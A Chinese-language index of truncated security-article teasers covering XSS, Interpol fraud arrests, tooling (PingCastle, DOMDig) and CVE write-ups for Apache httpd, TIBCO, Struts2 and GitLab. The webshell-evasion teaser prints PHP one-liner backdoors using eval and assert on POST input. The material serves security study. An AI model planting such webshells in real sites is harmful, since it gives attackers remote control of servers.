WEB安全基础篇-跨站脚本攻击(XSS)
前言 此文章总结学习于《白帽子讲WEB安全》 跨站脚本攻击(XSS)是客户端安全的头号大敌,OWASP TOP 10多次把xss列在榜首。 一、XSS简述 XSS攻击是指黑客通过“HTML注入”篡改网页,插入恶意的...
国际刑警查获五千万美元,逾两千名“社会工程师”被捕
近日,有消息显示,一项代号为“2022第一缕光”(First Light 2022)的国际执法行动在全球范围内共查获了5000万美元赃款,数千名参与社会工程诈骗的人遭到逮捕。这项行动由国际刑警组织(Interp...
如何在Windows环境下快速搭建Web服务器并发布网页
1. 环境说明 本案例基于Windows Server 2012环境进行搭建,其他Windows系统可参考配置。 2. 配置实现 1)开启 Windows 下程序和功能,如下图所示(红框中所有功能); 注:Windows Server下安装...
pingcastle – Active Directory域控安全检测工具
工具 HACK_Learn pingcastle简介: PingCastle旨在使用基于风险评估和成熟度框架的方法快速评估 Active Directory 安全级别。它的目标不是完美的评估,而是效率的妥协。Active Directory 正迅...
DOMDig:一款针对单页应用的DOM XSS扫描工具
关于DOMDig DOMDig是一款运行于Chromium Web浏览器中的DOM XSS扫描工具,该工具能够以递归的方式扫描单页应用程序(SPA)。 跟其他扫描工具不同的地方在于,DOMDig可以通过追踪DOM树...
【初级】Httpd SSRF
cve-2021-40438漏洞描述:2021年9月16日,Apache官方发布了Apache httpd mod_proxy SSRF漏洞CVE-2021-40438,影响v2.4.48及以下版本。该版本中mod_proxy模块存在一处逻辑错误,导致攻击者可以控...
【初级】tibco 目录遍历
CVE-2018-18809漏洞描述:多款TIBCO Software产品中的默认服务器配置组件存在路径遍历漏洞。攻击者可利用该漏洞访问主机系统内容。以下产品和版本受到影响:TIBCO JasperReports Library 6.3.4...
【初级】Struts2漏洞之S2-008
CVE-2012-0391 漏洞描述:2.2.3.1 之前的 Apache Struts 中的 ExceptionDelegator 组件在对不匹配的属性数据类型进行某些异常处理期间将参数值解释为 OGNL 表达式,这允许远程攻击者通过精心设...
关于PHP的webshell免杀小结
0X00普通的一句话木马(适用于CTF和小站) <?php eval($_POST['a']); ?> //函数的相似替换 <?php assert($_POST['a']); ?> <?php @eval($_POST['110']);?>与第一个一句话木马...
【初级】GITLAB SSRF 未授权漏洞
CVE-2021-22214 漏洞描述:GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。Gi...